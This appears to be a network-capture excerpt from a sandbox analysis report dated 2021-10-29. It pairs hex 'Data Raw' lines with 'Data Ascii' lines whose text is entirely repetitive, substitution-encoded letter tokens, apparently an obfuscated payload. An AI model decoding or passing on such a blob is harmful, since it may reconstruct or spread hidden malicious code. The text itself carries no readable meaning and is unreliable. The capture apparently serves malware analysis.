                                                  2021-10-29 18:29:49 UTC164INData Raw: 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 71 58 4a 20 57 58 20 71 70 4d 20 4d 4a 20 4d 58 20 71 71 45 20 71 4d 4f 20 71 71 70 20 71 45 20 71 57 70 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 4a 6d 70 20 71 4f 71 20 45 44 20 57 45 20 4a 6d 4d 20 57 4f 20 4a 4a 44 20 58 57 20 58 4d 20 4a 4a 4f 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 71 58 4f 20 44 4a 20 71 44 20 71 4a 71 20 71 4f 71 20 71 4f 4d 20 71 44 6d 20 57 71 20 6d 20 71 57 57 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 4a 70 57 20 71 4a 4f 20 4a 70 57 20 44 4f 20 4a 57 71 20 57 6d 20 71 4a 4d 20 71 71 57 20 45 70 20 71 4d 44 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 71 45 44 20 4d 4a 20 71 6d 45 20 71 4a 71 20 71 4a 57 20 71 71 4a 20 4a 70 71 20 6d 4d 20 71 71 4d 20 71 57 4d 20 58 6d 20 71 71 6d 20
                                                  Data Ascii: E qOM qqJ WO qXJ WX qpM MJ MX qqE qMO qqp qE qWp WO Wm Xm qqm Jmp qOq ED WE JmM WO JJD XW XM JJO qOM qqJ WO mX qXO DJ qD qJq qOq qOM qDm Wq m qWW Wm Xm qqm qqE JpW qJO JpW DO JWq Wm qJM qqW Ep qMD qqJ WO mX WO qED MJ qmE qJq qJW qqJ Jpq mM qqM qWM Xm qqm
                                                  2021-10-29 18:29:49 UTC168INData Raw: 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 4a 6d 70 20 57 4f 20 4d 58 20 6d 58 20 4a 4a 71 20 44 45 20 6d 57 20 71 71 4d 20 4a 70 44 20 4a 71 4d 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 4a 71 4f 20 71 4f 44 20 4a 57 70 20 58 4d 20 71 71 45 20 57 4f 20 58 4f 20 6d 58 20 71 57 4f 20 4a 57 57 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 4a 71 71 20 6d 4d 20 71 70 4d 20 4a 71 20 58 57 20 71 71 6d 20 4a 4f 20 71 71 71 20 4a 71 4a 20 71 57 70 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 6d 45 20 71 71 44 20 71 45 71 20 6d 58 20 6d 71 20 6d 58 20 58 70 20 57 4a 20 6d 20 4a 4a 70 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 4a 4f 4d 20 57 4d 20 70 57 20 71 4f 45 20 4a 4f 70 20 71 4f 4d 20 71 4a 20 71 71 6d 20 71 4f 44 20 71 57 45 20 57 4f 20 57 6d 20 58 6d 20
                                                  Data Ascii: m qqm qqE qOM Jmp WO MX mX JJq DE mW qqM JpD JqM WO mX WO Wm JqO qOD JWp XM qqE WO XO mX qWO JWW qqm qqE qOM qqJ Jqq mM qpM Jq XW qqm JO qqq JqJ qWp mX WO Wm Xm qmE qqD qEq mX mq mX Xp WJ m JJp qqE qOM qqJ WO JOM WM pW qOE JOp qOM qJ qqm qOD qWE WO Wm Xm
                                                  2021-10-29 18:29:49 UTC172INData Raw: 71 70 20 71 71 45 20 71 71 6d 20 45 58 20 57 4f 20 6d 58 20 57 71 20 57 6d 20 57 57 20 4d 70 20 71 71 45 20 71 4f 4d 20 71 71 6d 20 57 4f 20 71 57 70 20 71 4f 20 57 6d 20 58 6d 20 71 71 70 20 71 71 45 20 71 71 6d 20 45 58 20 57 4f 20 6d 58 20 57 71 20 57 6d 20 57 57 20 4d 70 20 71 71 45 20 71 4f 4d 20 71 71 6d 20 57 4f 20 71 57 70 20 71 4f 20 57 6d 20 58 6d 20 71 71 70 20 71 71 45 20 71 71 6d 20 45 58 20 57 4f 20 6d 58 20 57 71 20 57 6d 20 57 57 20 4d 70 20 71 71 45 20 71 4f 4d 20 71 71 6d 20 57 4f 20 71 57 70 20 71 4f 20 57 6d 20 58 6d 20 71 71 70 20 71 71 45 20 71 71 6d 20 45 58 20 57 4f 20 6d 58 20 57 71 20 57 6d 20 57 57 20 4d 70 20 71 71 45 20 71 4f 4d 20 71 71 6d 20 57 4f 20 71 57 70 20 71 4f 20 57 6d 20 58 6d 20 71 71 70 20 71 71 45 20 71 71 6d 20
                                                  Data Ascii: qp qqE qqm EX WO mX Wq Wm WW Mp qqE qOM qqm WO qWp qO Wm Xm qqp qqE qqm EX WO mX Wq Wm WW Mp qqE qOM qqm WO qWp qO Wm Xm qqp qqE qqm EX WO mX Wq Wm WW Mp qqE qOM qqm WO qWp qO Wm Xm qqp qqE qqm EX WO mX Wq Wm WW Mp qqE qOM qqm WO qWp qO Wm Xm qqp qqE qqm
                                                  2021-10-29 18:29:49 UTC176INData Raw: 57 4f 20 4a 6d 45 20 4a 57 20 57 6d 20 58 6d 20 71 71 58 20 71 71 45 20 45 58 20 45 71 20 57 4f 20 6d 58 20 57 71 20 57 6d 20 4a 6d 4d 20 4d 71 20 71 71 45 20 71 4f 4d 20 71 71 70 20 57 4f 20 71 57 45 20 4a 45 20 57 6d 20 58 6d 20 71 71 57 20 71 71 45 20 71 4d 4a 20 58 4d 20 57 4f 20 6d 58 20 57 71 20 57 6d 20 4a 45 20 58 57 20 71 71 45 20 71 4f 4d 20 71 71 70 20 57 4f 20 71 4a 45 20 4a 71 20 57 6d 20 58 6d 20 71 71 57 20 71 71 45 20 70 6d 20 58 45 20 57 4f 20 6d 58 20 57 71 20 57 6d 20 4a 45 20 58 57 20 71 71 45 20 71 4f 4d 20 71 71 70 20 57 4f 20 71 4a 45 20 4a 71 20 57 6d 20 58 6d 20 71 71 57 20 71 71 45 20 57 4d 20 58 4d 20 57 4f 20 6d 58 20 6d 58 20 57 6d 20 4a 71 45 20 4d 71 20 71 71 45 20 71 4f 4d 20 71 71 70 20 57 4f 20 71 4a 45 20 4a 71 20 57 6d
                                                  Data Ascii: WO JmE JW Wm Xm qqX qqE EX Eq WO mX Wq Wm JmM Mq qqE qOM qqp WO qWE JE Wm Xm qqW qqE qMJ XM WO mX Wq Wm JE XW qqE qOM qqp WO qJE Jq Wm Xm qqW qqE pm XE WO mX Wq Wm JE XW qqE qOM qqp WO qJE Jq Wm Xm qqW qqE WM XM WO mX mX Wm JqE Mq qqE qOM qqp WO qJE Jq Wm
                                                  2021-10-29 18:29:49 UTC180INData Raw: 6d 58 20 57 44 20 57 6d 20 71 57 57 20 58 58 20 71 71 45 20 71 4f 4d 20 71 4a 70 20 57 4f 20 71 71 57 20 71 57 20 57 4a 20 58 6d 20 71 71 57 20 71 71 45 20 4d 70 20 57 4f 20 57 4f 20 6d 58 20 6d 58 20 57 6d 20 45 57 20 45 44 20 71 71 45 20 71 4f 4d 20 71 71 70 20 57 4f 20 71 71 57 20 71 57 20 57 6d 20 58 6d 20 71 71 4a 20 71 71 45 20 71 4a 70 20 71 71 4f 20 57 4f 20 6d 58 20 57 71 20 57 6d 20 71 4f 71 20 6d 58 20 71 71 45 20 71 4f 4d 20 71 71 70 20 57 4f 20 71 20 71 71 4a 20 57 6d 20 58 6d 20 71 71 4a 20 71 71 45 20 71 44 4a 20 4d 4f 20 57 4f 20 6d 58 20 6d 4d 20 57 6d 20 4a 70 20 45 4d 20 71 71 45 20 71 4f 4d 20 71 71 70 20 57 4f 20 6d 45 20 71 4a 20 57 6d 20 58 6d 20 71 71 57 20 71 71 45 20 6d 44 20 45 45 20 57 4f 20 6d 58 20 6d 58 20 57 6d 20 44 44 20
                                                  Data Ascii: mX WD Wm qWW XX qqE qOM qJp WO qqW qW WJ Xm qqW qqE Mp WO WO mX mX Wm EW ED qqE qOM qqp WO qqW qW Wm Xm qqJ qqE qJp qqO WO mX Wq Wm qOq mX qqE qOM qqp WO q qqJ Wm Xm qqJ qqE qDJ MO WO mX mM Wm Jp EM qqE qOM qqp WO mE qJ Wm Xm qqW qqE mD EE WO mX mX Wm DD
                                                  2021-10-29 18:29:49 UTC184INData Raw: 20 71 71 4f 20 6d 71 20 70 71 20 4a 70 4f 20 57 6d 20 71 4d 4d 20 58 45 20 6d 20 71 4f 44 20 71 45 45 20 71 71 44 20 4a 70 4f 20 6d 58 20 71 44 70 20 4a 4d 20 71 71 57 20 71 71 6d 20 71 71 44 20 71 4f 58 20 4a 6d 58 20 44 20 4a 71 71 20 57 6d 20 70 4d 20 58 57 20 4a 4d 20 44 58 20 71 70 57 20 71 71 44 20 57 71 20 57 4a 20 44 44 20 4d 20 71 44 45 20 71 71 58 20 71 71 44 20 71 4f 57 20 71 71 57 20 4d 20 4a 4f 71 20 57 6d 20 44 70 20 58 4f 20 70 70 20 71 71 4f 20 71 6d 44 20 71 71 44 20 4a 70 58 20 6d 58 20 71 58 44 20 4a 20 58 57 20 71 71 6d 20 71 4f 4f 20 71 4f 57 20 71 70 58 20 4a 71 20 6d 4f 20 57 57 20 4a 70 20 58 4f 20 71 4d 70 20 58 44 20 71 4f 58 20 71 71 4a 20 71 4d 20 57 4a 20 70 45 20 71 71 58 20 58 57 20 71 71 6d 20 71 71 44 20 71 4f 58 20 71 58
                                                  Data Ascii: qqO mq pq JpO Wm qMM XE m qOD qEE qqD JpO mX qDp JM qqW qqm qqD qOX JmX D Jqq Wm pM XW JM DX qpW qqD Wq WJ DD M qDE qqX qqD qOW qqW M JOq Wm Dp XO pp qqO qmD qqD JpX mX qXD J XW qqm qOO qOW qpX Jq mO WW Jp XO qMp XD qOX qqJ qM WJ pE qqX XW qqm qqD qOX qX
                                                  2021-10-29 18:29:49 UTC188INData Raw: 20 57 70 20 71 58 44 20 4a 20 58 57 20 71 71 6d 20 70 44 20 71 4f 6d 20 4a 6d 45 20 4a 71 20 44 58 20 44 70 20 71 4f 70 20 58 71 20 71 45 44 20 58 4a 20 4a 57 20 71 4a 57 20 71 4f 45 20 57 70 20 70 4d 20 71 6d 20 6d 57 20 71 4a 45 20 44 4f 20 71 71 71 20 71 58 20 71 71 6d 20 71 45 44 20 44 70 20 71 4a 45 20 58 44 20 4a 6d 6d 20 57 70 20 4a 70 45 20 71 4a 57 20 71 4a 70 20 57 4f 20 44 57 20 71 71 58 20 4a 71 4a 20 71 4a 45 20 44 4f 20 71 71 71 20 70 6d 20 71 71 6d 20 71 45 44 20 44 70 20 71 4f 70 20 58 71 20 4a 71 44 20 71 4f 44 20 4a 70 6d 20 71 4a 57 20 4d 71 20 57 70 20 71 58 44 20 4a 20 58 57 20 71 71 6d 20 4a 58 20 71 4f 6d 20 45 4a 20 4a 6d 20 57 70 20 57 4f 20 4d 57 20 58 71 20 71 4f 6d 20 4d 57 20 71 4f 6d 20 71 71 4a 20 4d 71 20 57 70 20 4a 44 20
                                                  Data Ascii: Wp qXD J XW qqm pD qOm JmE Jq DX Dp qOp Xq qED XJ JW qJW qOE Wp pM qm mW qJE DO qqq qX qqm qED Dp qJE XD Jmm Wp JpE qJW qJp WO DW qqX JqJ qJE DO qqq pm qqm qED Dp qOp Xq JqD qOD Jpm qJW Mq Wp qXD J XW qqm JX qOm EJ Jm Wp WO MW Xq qOm MW qOm qqJ Mq Wp JD
                                                  2021-10-29 18:29:49 UTC191INData Raw: 4f 20 71 4d 70 20 71 71 45 20 70 57 20 71 4f 44 20 71 57 57 20 57 4a 20 71 4a 4d 20 57 6d 20 71 4f 20 71 4f 6d 20 71 58 58 20 71 4f 57 20 71 4d 57 20 57 4f 20 71 6d 20 6d 4f 20 4a 4a 70 20 58 4f 20 71 4d 70 20 71 71 45 20 70 57 20 71 4f 44 20 6d 4d 20 57 70 20 71 6d 57 20 57 6d 20 45 44 20 71 71 4f 20 71 4a 6d 20 71 4f 6d 20 71 4d 57 20 57 4f 20 71 71 4f 20 6d 4f 20 70 71 20 58 71 20 71 4d 70 20 71 71 45 20 70 20 71 4f 44 20 71 71 57 20 57 70 20 71 71 70 20 57 6d 20 71 44 4a 20 71 4a 57 20 57 6d 20 71 4f 6d 20 4a 71 71 20 57 4f 20 71 71 4a 20 6d 44 20 71 4a 45 20 58 71 20 71 4d 70 20 71 71 45 20 71 4d 20 71 4f 44 20 58 70 20 57 70 20 71 71 70 20 57 6d 20 71 44 4a 20 71 4a 57 20 4a 58 20 71 4f 6d 20 71 4d 57 20 57 4f 20 71 4d 4f 20 6d 4f 20 71 58 70 20 58
                                                  Data Ascii: O qMp qqE pW qOD qWW WJ qJM Wm qO qOm qXX qOW qMW WO qm mO JJp XO qMp qqE pW qOD mM Wp qmW Wm ED qqO qJm qOm qMW WO qqO mO pq Xq qMp qqE p qOD qqW Wp qqp Wm qDJ qJW Wm qOm Jqq WO qqJ mD qJE Xq qMp qqE qM qOD Xp Wp qqp Wm qDJ qJW JX qOm qMW WO qMO mO qXp X
                                                  2021-10-29 18:29:49 UTC196INData Raw: 57 57 20 71 4a 45 20 57 4f 20 6d 71 20 57 45 20 57 6d 20 71 44 4a 20 71 4a 57 20 58 57 20 71 71 44 20 71 4a 70 20 57 4f 20 71 4d 58 20 44 71 20 71 71 58 20 45 45 20 71 4a 71 20 71 71 45 20 71 57 57 20 71 4a 45 20 58 4a 20 6d 71 20 57 45 20 57 6d 20 71 44 4a 20 71 4a 57 20 4a 6d 57 20 71 71 44 20 71 4a 70 20 57 4f 20 71 4d 58 20 44 71 20 4a 6d 44 20 45 45 20 71 4a 71 20 71 71 45 20 71 57 57 20 71 4a 45 20 4a 71 4f 20 6d 71 20 57 45 20 57 6d 20 71 44 4a 20 71 4a 57 20 71 6d 4d 20 71 71 70 20 57 71 20 57 4f 20 71 4d 58 20 44 71 20 71 57 4f 20 45 70 20 6d 4d 20 71 71 45 20 71 57 57 20 71 4a 45 20 4a 6d 4a 20 6d 57 20 71 71 70 20 57 6d 20 71 44 4a 20 71 4a 57 20 71 6d 4d 20 71 71 4a 20 57 71 20 57 4f 20 71 4d 58 20 44 71 20 57 6d 20 45 6d 20 6d 4d 20 71 71 45
                                                  Data Ascii: WW qJE WO mq WE Wm qDJ qJW XW qqD qJp WO qMX Dq qqX EE qJq qqE qWW qJE XJ mq WE Wm qDJ qJW JmW qqD qJp WO qMX Dq JmD EE qJq qqE qWW qJE JqO mq WE Wm qDJ qJW qmM qqp Wq WO qMX Dq qWO Ep mM qqE qWW qJE JmJ mW qqp Wm qDJ qJW qmM qqJ Wq WO qMX Dq Wm Em mM qqE
                                                  2021-10-29 18:29:49 UTC200INData Raw: 20 4d 4f 20 57 71 20 57 4f 20 71 4d 58 20 44 71 20 57 6d 20 71 4f 58 20 6d 4d 20 71 71 45 20 71 57 57 20 71 4a 45 20 71 58 20 58 20 71 71 70 20 57 6d 20 71 44 4a 20 71 4a 57 20 57 70 20 58 57 20 57 71 20 57 4f 20 71 4d 58 20 44 71 20 58 44 20 71 4f 58 20 6d 4d 20 71 71 45 20 71 57 57 20 71 4a 45 20 71 45 58 20 58 20 71 71 70 20 57 6d 20 71 44 4a 20 71 4a 57 20 4a 71 70 20 58 57 20 57 71 20 57 4f 20 71 4d 58 20 44 71 20 4a 6d 44 20 71 4f 58 20 6d 4d 20 71 71 45 20 71 57 57 20 71 4a 45 20 4a 71 4f 20 58 20 71 71 70 20 57 6d 20 71 44 4a 20 71 4a 57 20 71 71 45 20 58 6d 20 57 71 20 57 4f 20 71 4d 58 20 44 71 20 4a 4a 20 71 4f 4d 20 6d 4d 20 71 71 45 20 71 57 57 20 71 4a 45 20 71 71 6d 20 4d 20 71 71 70 20 57 6d 20 71 44 4a 20 71 4a 57 20 4a 71 20 58 6d 20 57
                                                  Data Ascii: MO Wq WO qMX Dq Wm qOX mM qqE qWW qJE qX X qqp Wm qDJ qJW Wp XW Wq WO qMX Dq XD qOX mM qqE qWW qJE qEX X qqp Wm qDJ qJW Jqp XW Wq WO qMX Dq JmD qOX mM qqE qWW qJE JqO X qqp Wm qDJ qJW qqE Xm Wq WO qMX Dq JJ qOM mM qqE qWW qJE qqm M qqp Wm qDJ qJW Jq Xm W
                                                  2021-10-29 18:29:49 UTC204INData Raw: 71 4f 71 20 58 4f 20 58 71 20 71 4f 58 20 71 4f 4d 20 71 71 4a 20 4a 70 44 20 57 6d 20 71 45 20 6d 45 20 58 6d 20 71 71 6d 20 71 58 4f 20 71 4f 71 20 58 70 20 6d 70 20 6d 58 20 57 4f 20 71 4a 44 20 4d 57 20 58 71 20 71 4f 58 20 71 4f 4d 20 71 71 4a 20 4a 71 57 20 44 4f 20 71 45 20 6d 45 20 58 6d 20 71 71 6d 20 57 4f 20 4d 4d 20 58 70 20 6d 70 20 6d 58 20 57 4f 20 71 71 70 20 4d 71 20 4a 4a 71 20 71 4f 58 20 71 4f 4d 20 71 71 4a 20 71 4f 45 20 70 70 20 71 45 20 6d 45 20 58 6d 20 71 71 6d 20 71 44 4f 20 71 4a 6d 20 58 70 20 6d 70 20 6d 58 20 57 4f 20 4a 4d 20 58 6d 20 58 71 20 71 4f 58 20 71 4f 4d 20 71 71 4a 20 4a 71 20 57 71 20 71 45 20 6d 45 20 58 6d 20 71 71 6d 20 71 44 4f 20 71 4f 57 20 4a 71 4a 20 6d 70 20 6d 58 20 57 4f 20 71 57 20 58 70 20 58 71 20
                                                  Data Ascii: qOq XO Xq qOX qOM qqJ JpD Wm qE mE Xm qqm qXO qOq Xp mp mX WO qJD MW Xq qOX qOM qqJ JqW DO qE mE Xm qqm WO MM Xp mp mX WO qqp Mq JJq qOX qOM qqJ qOE pp qE mE Xm qqm qDO qJm Xp mp mX WO JM Xm Xq qOX qOM qqJ Jq Wq qE mE Xm qqm qDO qOW JqJ mp mX WO qW Xp Xq
                                                  2021-10-29 18:29:49 UTC208INData Raw: 4a 57 6d 20 6d 4d 20 4a 6d 70 20 57 6d 20 58 57 20 71 71 6d 20 71 58 6d 20 71 4f 58 20 71 45 45 20 57 4f 20 57 4f 20 57 4f 20 4a 6d 58 20 58 57 20 71 45 45 20 71 71 45 20 71 4f 58 20 71 71 4a 20 4a 57 70 20 6d 4d 20 4a 6d 71 20 57 6d 20 58 44 20 71 71 6d 20 71 44 6d 20 71 4f 58 20 71 58 71 20 57 4f 20 6d 4d 20 57 4f 20 4a 4a 58 20 58 57 20 71 58 70 20 71 71 45 20 71 71 71 20 71 71 4a 20 44 71 20 57 4f 20 4a 6d 57 20 57 6d 20 58 44 20 71 71 6d 20 71 4f 4f 20 71 71 71 20 71 58 57 20 57 4f 20 57 6d 20 57 4f 20 70 4f 20 58 6d 20 4d 45 20 71 71 45 20 57 4d 20 71 71 4a 20 6d 4f 20 57 4a 20 70 45 20 57 6d 20 4a 20 71 71 6d 20 71 4f 57 20 71 4f 57 20 71 4f 57 20 57 4f 20 71 4f 4a 20 57 4f 20 6d 4f 20 58 4f 20 71 4f 57 20 71 71 45 20 57 4d 20 71 71 4a 20 71 58 20
                                                  Data Ascii: JWm mM Jmp Wm XW qqm qXm qOX qEE WO WO WO JmX XW qEE qqE qOX qqJ JWp mM Jmq Wm XD qqm qDm qOX qXq WO mM WO JJX XW qXp qqE qqq qqJ Dq WO JmW Wm XD qqm qOO qqq qXW WO Wm WO pO Xm ME qqE WM qqJ mO WJ pE Wm J qqm qOW qOW qOW WO qOJ WO mO XO qOW qqE WM qqJ qX
                                                  2021-10-29 18:29:49 UTC212INData Raw: 20 71 71 4a 20 58 4a 20 6d 58 20 71 71 4d 20 57 6d 20 57 70 20 71 71 6d 20 6d 58 20 71 4f 4d 20 71 58 20 57 4f 20 71 71 45 20 57 4f 20 58 57 20 58 6d 20 57 57 20 71 71 45 20 4d 20 71 71 4a 20 71 71 4d 20 6d 58 20 58 45 20 57 6d 20 71 45 20 71 71 6d 20 71 4d 20 71 4f 4d 20 57 70 20 57 4f 20 58 45 20 57 4f 20 71 71 57 20 58 6d 20 4a 44 20 71 71 45 20 6d 4f 20 71 71 4a 20 4d 71 20 6d 58 20 71 71 4d 20 57 6d 20 44 4a 20 71 71 6d 20 6d 58 20 71 4f 4d 20 4a 45 20 57 4f 20 71 71 45 20 57 4f 20 4d 4f 20 58 6d 20 57 57 20 71 71 45 20 4f 20 71 71 4a 20 71 71 4d 20 6d 58 20 4d 4a 20 57 6d 20 71 45 20 71 71 6d 20 4a 44 20 71 4f 4d 20 57 70 20 57 4f 20 44 6d 20 57 4f 20 71 71 57 20 58 6d 20 70 20 71 71 45 20 6d 4f 20 71 71 4a 20 44 6d 20 6d 58 20 71 71 4d 20 57 6d 20
                                                  Data Ascii: qqJ XJ mX qqM Wm Wp qqm mX qOM qX WO qqE WO XW Xm WW qqE M qqJ qqM mX XE Wm qE qqm qM qOM Wp WO XE WO qqW Xm JD qqE mO qqJ Mq mX qqM Wm DJ qqm mX qOM JE WO qqE WO MO Xm WW qqE O qqJ qqM mX MJ Wm qE qqm JD qOM Wp WO Dm WO qqW Xm p qqE mO qqJ Dm mX qqM Wm
                                                  2021-10-29 18:29:49 UTC223INData Raw: 20 4d 45 20 44 58 20 58 70 20 44 44 20 44 71 20 71 45 20 57 4a 20 70 71 20 4a 20 58 70 20 45 70 20 71 4a 70 20 58 58 20 44 71 20 44 20 70 70 20 4a 4f 20 4f 20 58 45 20 4d 4d 20 4d 71 20 45 44 20 6d 4d 20 45 4d 20 44 58 20 4d 71 20 71 71 4a 20 58 57 20 58 57 20 45 4f 20 71 4f 57 20 4a 4d 20 4a 4a 20 44 58 20 4d 71 20 71 71 4a 20 44 57 20 58 57 20 45 4f 20 71 4f 57 20 4a 4d 20 4a 4a 20 44 58 20 4d 71 20 71 71 4a 20 71 71 4d 20 4d 6d 20 45 4f 20 4d 57 20 70 4a 20 71 71 20 44 58 20 4d 71 20 71 71 4a 20 44 20 71 20 4a 20 71 71 6d 20 4d 45 20 45 71 20 44 58 20 6d 45 20 57 6d 20 71 71 20 71 71 44 20 71 71 70 20 45 20 71 58 20 44 44 20 57 6d 20 6d 70 20 44 44 20 6d 20 4a 20 71 71 4d 20 4a 20 71 44 20 6d 58 20 44 58 20 4d 70 20 45 71 20 57 20 45 20 71 71 20 70 20
                                                  Data Ascii: ME DX Xp DD Dq qE WJ pq J Xp Ep qJp XX Dq D pp JO O XE MM Mq ED mM EM DX Mq qqJ XW XW EO qOW JM JJ DX Mq qqJ DW XW EO qOW JM JJ DX Mq qqJ qqM Mm EO MW pJ qq DX Mq qqJ D q J qqm ME Eq DX mE Wm qq qqD qqp E qX DD Wm mp DD m J qqM J qD mX DX Mp Eq W E qq p
                                                  2021-10-29 18:29:49 UTC228INData Raw: 4d 20 6d 58 20 6d 6d 20 57 6d 20 6d 20 71 20 70 20 44 20 4a 71 20 44 44 20 44 58 20 58 6d 20 44 44 20 4f 20 71 71 6d 20 57 4f 20 71 71 6d 20 71 58 20 44 6d 20 57 57 20 6d 71 20 57 71 20 71 20 4d 20 57 20 70 20 71 44 20 6d 4d 20 45 71 20 58 58 20 57 4f 20 71 71 44 20 71 71 70 20 71 71 44 20 71 71 4a 20 4a 71 20 45 4f 20 45 44 20 4d 4f 20 45 4f 20 71 71 4d 20 4d 20 71 71 70 20 71 71 6d 20 71 4f 71 20 57 57 20 45 4f 20 58 57 20 6d 4d 20 71 71 57 20 71 71 44 20 71 71 44 20 4a 20 4d 58 20 44 57 20 57 57 20 71 4f 4d 20 45 70 20 71 71 58 20 4d 20 71 71 57 20 71 71 4a 20 71 4f 70 20 57 71 20 6d 58 20 4d 4a 20 44 57 20 71 71 57 20 57 20 71 4f 20 71 71 6d 20 4d 45 20 45 71 20 6d 58 20 6d 45 20 45 4a 20 71 71 57 20 44 20 71 71 57 20 71 71 57 20 4a 70 20 45 6d 20 57
                                                  Data Ascii: M mX mm Wm m q p D Jq DD DX Xm DD O qqm WO qqm qX Dm WW mq Wq q M W p qD mM Eq XX WO qqD qqp qqD qqJ Jq EO ED MO EO qqM M qqp qqm qOq WW EO XW mM qqW qqD qqD J MX DW WW qOM Ep qqX M qqW qqJ qOp Wq mX MJ DW qqW W qO qqm ME Eq mX mE EJ qqW D qqW qqW Jp Em W
                                                  2021-10-29 18:29:49 UTC244INData Raw: 20 58 45 20 57 4f 20 71 71 45 20 57 4d 20 4a 58 20 70 20 58 20 4a 20 45 4f 20 71 4f 4f 20 4d 70 20 4d 4d 20 4a 6d 20 4a 4d 20 4a 45 20 71 4f 20 71 71 4a 20 4d 6d 20 4d 57 20 58 57 20 57 6d 20 70 4d 20 71 45 20 4a 4f 20 70 20 70 4f 20 58 45 20 44 44 20 71 71 57 20 44 58 20 57 71 20 71 71 6d 20 70 58 20 58 20 71 45 20 44 6d 20 58 70 20 4d 4f 20 57 6d 20 4a 57 20 71 4d 20 71 20 71 6d 20 4a 6d 20 57 4f 20 71 71 4d 20 58 45 20 44 44 20 4a 57 20 4a 4a 20 44 6d 20 70 45 20 71 45 20 44 57 20 58 58 20 57 4f 20 71 71 45 20 57 4d 20 70 71 20 57 20 4a 6d 20 6d 20 58 45 20 71 4a 4f 20 58 70 20 44 4d 20 44 4f 20 71 71 6d 20 57 44 20 71 4a 20 6d 20 4d 4f 20 6d 58 20 44 44 20 44 58 20 57 4d 20 4a 4f 20 4a 58 20 71 20 4a 71 20 4d 58 20 58 71 20 45 4f 20 4d 6d 20 58 6d 20
                                                  Data Ascii: XE WO qqE WM JX p X J EO qOO Mp MM Jm JM JE qO qqJ Mm MW XW Wm pM qE JO p pO XE DD qqW DX Wq qqm pX X qE Dm Xp MO Wm JW qM q qm Jm WO qqM XE DD JW JJ Dm pE qE DW XX WO qqE WM pq W Jm m XE qJO Xp DM DO qqm WD qJ m MO mX DD DX WM JO JX q Jq MX Xq EO Mm Xm
                                                  2021-10-29 18:29:49 UTC255INData Raw: 4a 20 4a 4d 20 4a 4f 20 4d 6d 20 71 4f 44 20 57 20 4a 20 71 57 20 4a 70 20 4a 70 20 45 20 4a 57 20 4a 57 20 58 6d 20 58 4d 20 58 71 20 58 45 20 70 4a 20 4a 70 20 44 20 71 4f 4d 20 70 6d 20 58 45 20 4d 4a 20 58 45 20 58 45 20 70 4d 20 4a 70 20 70 4a 20 4a 4d 20 4a 4f 20 58 70 20 44 58 20 58 45 20 44 4d 20 58 6d 20 70 70 20 71 20 70 71 20 4a 57 20 44 44 20 4d 45 20 45 71 20 58 4d 20 70 4a 20 4a 70 20 44 20 71 4f 4d 20 57 6d 20 44 6d 20 4d 57 20 4d 57 20 71 4a 70 20 44 71 20 4a 58 20 4f 20 4a 57 20 4a 71 20 44 57 20 6d 58 20 71 4f 4d 20 58 4f 20 44 71 20 70 4f 20 71 44 20 6d 45 20 4d 20 45 4f 20 58 57 20 44 57 20 57 6d 20 70 20 4f 20 4a 58 20 4a 57 20 4a 71 20 71 71 57 20 4d 4a 20 4d 6d 20 71 71 44 20 6d 57 20 44 20 71 44 20 70 4f 20 71 71 4a 20 71 71 70 20
                                                  Data Ascii: J JM JO Mm qOD W J qW Jp Jp E JW JW Xm XM Xq XE pJ Jp D qOM pm XE MJ XE XE pM Jp pJ JM JO Xp DX XE DM Xm pp q pq JW DD ME Eq XM pJ Jp D qOM Wm Dm MW MW qJp Dq JX O JW Jq DW mX qOM XO Dq pO qD mE M EO XW DW Wm p O JX JW Jq qqW MJ Mm qqD mW D qD pO qqJ qqp
                                                  2021-10-29 18:29:49 UTC271INData Raw: 44 58 20 71 4f 4d 20 71 71 4a 20 6d 4d 20 45 44 20 57 4f 20 57 6d 20 4d 71 20 70 4d 20 71 71 45 20 70 57 20 71 71 4a 20 71 4a 71 20 6d 58 20 71 4a 6d 20 57 6d 20 70 20 71 71 6d 20 57 58 20 71 4f 4d 20 44 4a 20 57 4f 20 6d 58 20 71 71 57 20 71 71 45 20 58 6d 20 4a 45 20 71 71 45 20 6d 4f 20 71 71 4a 20 4f 20 6d 58 20 71 71 4a 20 57 6d 20 6d 57 20 71 71 6d 20 4a 44 20 71 4f 4d 20 70 4f 20 57 4f 20 71 4f 4a 20 57 4f 20 71 4f 4f 20 58 6d 20 70 4d 20 71 71 45 20 70 4d 20 71 71 4a 20 71 4a 4f 20 6d 58 20 4d 6d 20 57 6d 20 57 57 20 71 71 6d 20 44 4a 20 71 4f 4d 20 57 4d 20 57 4f 20 45 6d 20 57 4f 20 71 71 4d 20 58 6d 20 57 45 20 71 71 45 20 57 58 20 71 71 4a 20 58 57 20 6d 58 20 58 4d 20 57 6d 20 6d 6d 20 71 71 6d 20 44 4f 20 71 4f 4d 20 4a 45 20 57 4f 20 71 4f
                                                  Data Ascii: DX qOM qqJ mM ED WO Wm Mq pM qqE pW qqJ qJq mX qJm Wm p qqm WX qOM DJ WO mX qqW qqE Xm JE qqE mO qqJ O mX qqJ Wm mW qqm JD qOM pO WO qOJ WO qOO Xm pM qqE pM qqJ qJO mX Mm Wm WW qqm DJ qOM WM WO Em WO qqM Xm WE qqE WX qqJ XW mX XM Wm mm qqm DO qOM JE WO qO
